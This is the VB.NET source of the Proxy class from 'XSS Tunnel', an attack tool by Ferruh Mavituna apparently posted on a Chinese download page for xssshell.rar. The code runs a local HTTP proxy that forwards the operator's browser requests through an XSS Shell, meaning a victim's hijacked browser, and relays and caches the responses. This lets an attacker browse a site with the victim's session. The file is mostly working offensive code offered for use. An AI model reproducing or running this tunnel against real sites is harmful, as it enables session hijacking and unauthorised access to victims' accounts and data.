资源名称:xssshell.rar [点击查看]
- #Region "GPL License"
- 'This file is part of XSS Tunnel.
- '
- 'XSS Tunnel, XSS Tunneling tool
- 'Copyright (C) 2007 Ferruh Mavituna
- 'This program is free software; you can redistribute it and/or
- 'modify it under the terms of the GNU General Public License
- 'as published by the Free Software Foundation; either version 2
- 'of the License, or (at your option) any later version.
- 'This program is distributed in the hope that it will be useful,
- 'but WITHOUT ANY WARRANTY; without even the implied warranty of
- 'GNU General Public License for more details.
- 'You should have received a copy of the GNU General Public License
- 'along with this program; if not, write to the Free Software
- 'Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
- #End Region
- Imports System.Net.Sockets
- Imports System.Net
- Imports System.IO
- ''' <summary>
- ''' Proxy Implementation for XSS Tunnel
- ''' </summary>
- ''' <remarks>
- ''' Get requests from client tunnel them to supplied XSSShell and reply browser
- ''' Doesn't support KeepAlive Proxy Connections
- '''
- ''' 21.06.2007
- ''' - Now Cache folder in temp folder to avoid potential permission problems
- ''' - Clear Cache added
- ''' - Stupid bind bug fixed caused by a mispelled variable name!
- ''' </remarks>
- Public Class Proxy
- #Region "Events"
- ''' <summary>
- ''' Resource Requested
- ''' </summary>
- ''' <param name="path"></param>
- ''' <remarks></remarks>
- Public Event Requested(ByVal path As String)
- ''' <summary>
- ''' Response Received from XSS Shell (victim's client)
- ''' </summary>
- ''' <param name="response"></param>
- ''' <remarks></remarks>
- Public Event ResponseReceived(ByVal response As ReadableResponse)
- ''' <summary>
- ''' Debug message sent
- ''' </summary>
- ''' <param name="message"></param>
- ''' <param name="sender"></param>
- ''' <remarks></remarks>
- Public Event DebugMessageSent(ByVal message As String, ByVal sender As Object)
- #End Region
- #Region "Constants"
- ''' <summary>
- ''' Default Read Buffer Size
- ''' </summary>
- ''' <remarks></remarks>
- Public Const DefaultBufferSize As Integer = 4096
- ''' <summary>
- ''' Default Buffer Increase Multiplier
- ''' </summary>
- ''' <remarks></remarks>
- Public Const DefaultIncreaseMultiplier As Integer = 3
- ''' <summary>
- ''' Is Keep Alive supported by client (normally should be extracted from HTTP Headers)
- ''' </summary>
- ''' <remarks></remarks>
- Public Const KeepAlive As Boolean = False
- ''' <summary>
- ''' Keep Alive Supported by Proxy
- ''' </summary>
- ''' <remarks></remarks>
- Public Const KeepAliveSupported As Boolean = False
- #End Region
- #Region "Constructor"
- ''' <summary>
- ''' New Proxy
- ''' </summary>
- ''' <param name="XSSShell"></param>
- ''' <remarks></remarks>
- Public Sub New(ByVal XSSShell As XSSShell)
- Me.XSSSHell = XSSShell
- End Sub
- ''' <summary>
- ''' New Proxy
- ''' </summary>
- ''' <param name="XSSShell"></param>
- ''' <param name="port"></param>
- ''' <param name="IPAddress"></param>
- ''' <remarks></remarks>
- Public Sub New(ByVal XSSShell As XSSShell, ByVal port As Integer, ByVal IPAddress As IPAddress)
- Me.XSSSHell = XSSShell
- Me.Port = port
- Me.IPAddress = IPAddress
- End Sub
- #End Region
- #Region "Properties"
- Private _Cached As Integer
- ''' <summary>
- ''' Cached Requests
- ''' </summary>
- ''' <value></value>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Public ReadOnly Property CachedRequests() As Integer
- Get
- Return _Cached
- End Get
- End Property
- Private _Requests As Integer
- ''' <summary>
- ''' Requests
- ''' </summary>
- ''' <value></value>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Public ReadOnly Property Requests() As Integer
- Get
- Return _Requests
- End Get
- End Property
- Private _Responses As Integer
- ''' <summary>
- ''' Responses
- ''' </summary>
- ''' <value></value>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Public ReadOnly Property Responses() As Integer
- Get
- Return _Responses
- End Get
- End Property
- Public _Port As Integer
- ''' <summary>
- ''' Port to Bind
- ''' </summary>
- ''' <value></value>
- ''' <returns></returns>
- ''' <remarks>Default : 8080</remarks>
- Private Property Port() As Integer
- Get
- If _Port = 0 Then _Port = 65000
- Return _Port
- End Get
- Set(ByVal value As Integer)
- 'TODO : Restart server when change
- _Port = value
- End Set
- End Property
- Private _XSSShell As XSSShell
- ''' <summary>
- ''' Related XSS Shell to tunnel data
- ''' </summary>
- ''' <value></value>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Public Property XSSSHell() As XSSShell
- Get
- Return _XSSShell
- End Get
- Set(ByVal value As XSSShell)
- _XSSShell = value
- End Set
- End Property
- Dim _RequestListener As TcpListener
- ''' <summary>
- ''' Request Listener
- ''' </summary>
- ''' <value></value>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Private ReadOnly Property RequestListener() As TcpListener
- Get
- Try
- If _RequestListener Is Nothing Then _RequestListener = New TcpListener(Me.IPAddress, Port)
- Catch ex As Exception
- WriteConsole("!Error proxy couldn't start to listen : " & ex.ToString)
- End Try
- 'Dns.Resolve(Dns.GetHostName()).AddressList(0)
- Return _RequestListener
- End Get
- End Property
- Private _IPAddress As IPAddress
- ''' <summary>
- ''' IP Address to bind
- ''' </summary>
- ''' <value></value>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Private Property IPAddress() As IPAddress
- Get
- If _IPAddress Is Nothing Then IPAddress = IPAddress.Any
- Return _IPAddress
- End Get
- Set(ByVal value As IPAddress)
- _IPAddress = value
- End Set
- End Property
- Private _ProxyMode As Boolean
- ''' <summary>
- ''' Act as a proper proxy, do not use XSSSHell
- ''' </summary>
- ''' <value></value>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Public Property ProxyMode() As Boolean
- Get
- Return _ProxyMode
- End Get
- Set(ByVal value As Boolean)
- _ProxyMode = value
- End Set
- End Property
- Private _CacheEnabled As Boolean
- ''' <summary>
- ''' Enable caching
- ''' </summary>
- ''' <value></value>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Public Property CacheEnabled() As Boolean
- Get
- Return _CacheEnabled
- End Get
- Set(ByVal value As Boolean)
- _CacheEnabled = value
- End Set
- End Property
- #End Region
- #Region "Core"
- ''' <summary>
- ''' Start Listen for incoming Connections
- ''' </summary>
- ''' <remarks></remarks>
- Public Sub Listen()
- Try
- RequestListener.Start()
- Catch ex As Exception
- WriteConsole("!Proxy start error : " & ex.ToString)
- Exit Sub
- End Try
- WriteConsole("Started to Listen : " & Me.IPAddress.ToString & ":" & Port)
- While True
- Try
- Dim Client As TcpClient = RequestListener.AcceptTcpClient()
- Dim ClientIP As IPEndPoint = CType(Client.Client.RemoteEndPoint, IPEndPoint)
- Console.WriteLine(ClientIP.Address.ToString() & ":" & ClientIP.Port.ToString() & " Connected...")
- Try
- Dim Thr As Threading.Thread
- 'If ProxyMode Then
- ' Thr = New Threading.Thread(AddressOf ProcessRequest)
- 'Else
- Thr = New Threading.Thread(AddressOf Me.ProcessTunnelledRequest)
- 'End If
- Thr.Start(Client)
- Catch ex As Exception
- WriteConsole("Thread Failed : " & ex.ToString)
- End Try
- Catch ex As Net.Sockets.SocketException
- WriteConsole("Stopped to listen!")
- Exit Sub
- End Try
- End While
- End Sub
- ''' <summary>
- ''' Raise Debug/Console Messages
- ''' </summary>
- ''' <param name="message"></param>
- ''' <remarks></remarks>
- Private Sub WriteConsole(ByVal message As String)
- Debug.WriteLine(message)
- RaiseEvent DebugMessageSent(message, Me)
- End Sub
- ''' <summary>
- ''' Stop Listening
- ''' </summary>
- ''' <remarks></remarks>
- Public Sub [Stop]()
- RequestListener.Stop()
- End Sub
- ''' <summary>
- ''' Read Request from TCPClient, fill buffer
- ''' </summary>
- ''' <param name="client"></param>
- ''' <param name="requestBuffer"></param>
- ''' <returns>Read byte, -1 if it fails</returns>
- ''' <remarks></remarks>
- Private Function ReadRequest(ByVal client As TcpClient, ByRef requestBuffer As Byte()) As Integer
- Dim ReadData As Integer
- Dim RequestReadOffset As Integer
- Try
- Do
- 'If there is no space in request buffer increase buffer (should be a huge one!)
- If requestBuffer.Length < RequestReadOffset + client.ReceiveBufferSize Then
- Array.Resize(Of Byte)(requestBuffer, requestBuffer.Length * DefaultIncreaseMultiplier)
- WriteConsole("Array Resized")
- End If
- ReadData = client.GetStream.Read(requestBuffer, RequestReadOffset, client.ReceiveBufferSize)
- RequestReadOffset += ReadData
- If ReadData < 1 Then Exit Do
- Loop While Text.Encoding.ASCII.GetString(requestBuffer, 0, RequestReadOffset).IndexOf(vbNewLine & vbNewLine) = -1
- Catch ex As Exception
- WriteConsole("Client TCP closed etc. Error")
- Return -1
- End Try
- Return RequestReadOffset
- End Function
- '''' <summary>
- '''' Write buffer
- '''' </summary>
- '''' <param name="buffer"></param>
- '''' <remarks></remarks>
- 'Private Shared Sub DebugBuffer(ByVal buffer() As Byte, ByVal title As String)
- ' Debug.WriteLine("------" & title & "------")
- ' Debug.WriteLine(System.Text.Encoding.ASCII.GetString(buffer).Trim())
- ' Debug.WriteLine("------------")
- 'End Sub
- Dim ErrorPage As String = "HTTP/1.1 200 OK" & vbNewLine & "Server: XSS Shell Proxy" & vbNewLine & "Content-Type: text/html" & vbNewLine & vbNewLine & "<html><head><title>Denied by XSS Shell Proxy</title></head><body><div style=""text-align:center"">This request is not supported by <em>XSS Shell Proxy</em></div></body></html>"
- #End Region
- #Region "XSS Tunnel"
- ''' <summary>
- ''' Get Cache Directory
- ''' </summary>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Private Shared Function GetCacheDirectory() As String
- 'Dim CacheDir As String = IO.Path.Combine(My.Application.Info.DirectoryPath, "cache")
- Dim CacheDir As String = IO.Path.Combine(IO.Path.GetTempPath(), "XSSTunnel-Cache")
- If Not Directory.Exists(CacheDir) Then
- Directory.CreateDirectory(CacheDir)
- End If
- Return CacheDir
- End Function
- ''' <summary>
- ''' Clear files in the cache folder
- ''' </summary>
- ''' <remarks></remarks>
- Public Shared Sub ClearCache()
- Dim CacheFolder As String = GetCacheDirectory()
- IO.Directory.Delete(CacheFolder, True)
- End Sub
- ''' <summary>
- ''' Get file from local cache
- ''' </summary>
- ''' <param name="path"></param>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Private Function GetFromCache(ByVal path As String) As Byte()
- If Not Me.CacheEnabled OrElse Not Cachable(path) Then Return Nothing
- Dim SaveFileName As String = GetCacheFileName(path)
- If File.Exists(SaveFileName) Then
- Return File.ReadAllBytes(SaveFileName)
- End If
- Return Nothing
- End Function
- ''' <summary>
- ''' Get path's cache file name
- ''' </summary>
- ''' <param name="path"></param>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Private Shared Function GetCacheFileName(ByVal path As String) As String
- Dim CacheDir As String = GetCacheDirectory()
- Dim SaveFileName As String = GetValidFileName(path)
- Return IO.Path.Combine(CacheDir, SaveFileName)
- End Function
- ''' <summary>
- ''' Is response / request cachable ?
- ''' </summary>
- ''' <param name="path"></param>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Private Function Cachable(ByVal path As String) As Boolean
- Try
- Select Case IO.Path.GetExtension(path)
- Case ".gif", ".jpg", ".js", ".css"
- Return True
- End Select
- Catch ex As Exception
- WriteConsole("Unexpected path")
- End Try
- Return False
- End Function
- ''' <summary>
- ''' Cache Response
- ''' </summary>
- ''' <param name="path"></param>
- ''' <remarks></remarks>
- Private Sub CacheResponse(ByVal path As String, ByVal content As Byte())
- If Not Cachable(path) Then Exit Sub
- Dim SaveFileName As String = GetCacheFileName(path)
- Try
- File.WriteAllBytes(SaveFileName, content)
- Catch ex As Exception
- WriteConsole("Cache write err!")
- End Try
- End Sub
- ''' <summary>
- ''' Get valid file name
- ''' </summary>
- ''' <param name="path"></param>
- ''' <returns></returns>
- ''' <remarks></remarks>
- Private Shared Function GetValidFileName(ByVal path As String) As String
- Dim FileName As String = path.Replace("/", "-").Replace("", "-")
- For Each Chr As Char In IO.Path.GetInvalidPathChars
- FileName = FileName.Replace(Chr, String.Empty)
- Next
- Return FileName
- End Function
- ''' <summary>
- ''' Process Tunneled Request
- ''' </summary>
- ''' <param name="tcpClient"></param>
- ''' <remarks></remarks>
- Private Sub ProcessTunnelledRequest(ByVal tcpClient As Object)
- Dim Browser As TcpClient = DirectCast(tcpClient, TcpClient)
- Browser.ReceiveBufferSize = DefaultBufferSize
- While True
- Dim requestBuffer(Browser.ReceiveBufferSize * DefaultIncreaseMultiplier) As Byte
- Dim ReadData As Integer
- ReadData = ReadRequest(Browser, requestBuffer)
- 'Err
- If ReadData = -1 Then
- Exit While
- End If
- 'Console.WriteLine(Text.Encoding.ASCII.GetString(requestBuffer, 0, ReadData))
- Dim HttpReq As New HttpParser(requestBuffer, ReadData)
- 'Check SSL Connections
- If HttpReq.Method = HttpParser.HTTPMethod.CONNECT Then
- WriteConsole("SSL connections not supported !")
- Browser.GetStream.Close()
- Browser.Close()
- Exit Sub
- End If
- If HttpReq.Url Is Nothing Then
- WriteConsole("Target host couldn't identified")
- Exit Sub
- End If
- Dim PostData As String = Nothing
- If HttpReq.Method = HttpParser.HTTPMethod.POST Then
- PostData = HttpReq.RequestBody
- End If
- 'Send and Wait for Response
- RaiseEvent Requested(HttpReq.Url.PathAndQuery)
- Threading.Interlocked.Increment(_Requests)
- ' Console.WriteLine("Requesting : " & HttpReq.Url.PathAndQuery)
- Dim HTTPResponse As HttpResponse
- Dim CachedResponse() As Byte = GetFromCache(HttpReq.Url.PathAndQuery)
- If CachedResponse Is Nothing Then
- HTTPResponse = XSSSHell.SendGetUriCommand(HttpReq.Url.PathAndQuery, PostData)
- 'Add it to cache
- If Not HTTPResponse Is Nothing Then CacheResponse(HttpReq.Url.PathAndQuery, HTTPResponse.Body)
- Threading.Interlocked.Increment(_Responses)
- Else ' Get from cache
- HTTPResponse = New HttpResponse()
- HTTPResponse.Status = 200
- HTTPResponse.StatusText = "OK"
- HTTPResponse.Body = CachedResponse
- HTTPResponse.AddHeader("Via-Cache", "XSS Tunnel")
- 'Console.WriteLine("Answer from Cache: " & HttpReq.Url.PathAndQuery)
- HTTPResponse.Cached = True
- Threading.Interlocked.Increment(_Cached)
- End If
- 'If there is a response otherwise, don't response so client will timeout (better than finishing with 200 OK)
- If Not HTTPResponse Is Nothing Then
- 'Response
- RaiseEvent ResponseReceived(New ReadableResponse(HttpReq.Url.PathAndQuery, HTTPResponse.Status, HTTPResponse.Cached))
- Dim ResponseBuffer() As Byte = HTTPResponse.GetServerResponse
- 'Write to client
- If Browser.Connected AndAlso Browser.GetStream.CanWrite Then
- Try
- Browser.GetStream.Write(ResponseBuffer, 0, ResponseBuffer.Length)
- Catch ex As IO.IOException
- WriteConsole("Write to browser, Error")
- End Try
- Else
- WriteConsole("Err & Cancelled!")
- End If
- End If
- If Not KeepAlive Then Exit While
- End While
- Try
- If Browser.Connected Then
- Browser.GetStream.Close()
- Browser.Close()
- End If
- Catch ex As Exception
- WriteConsole("Something stupid happened...")
- End Try
- End Sub
- #End Region
- End Class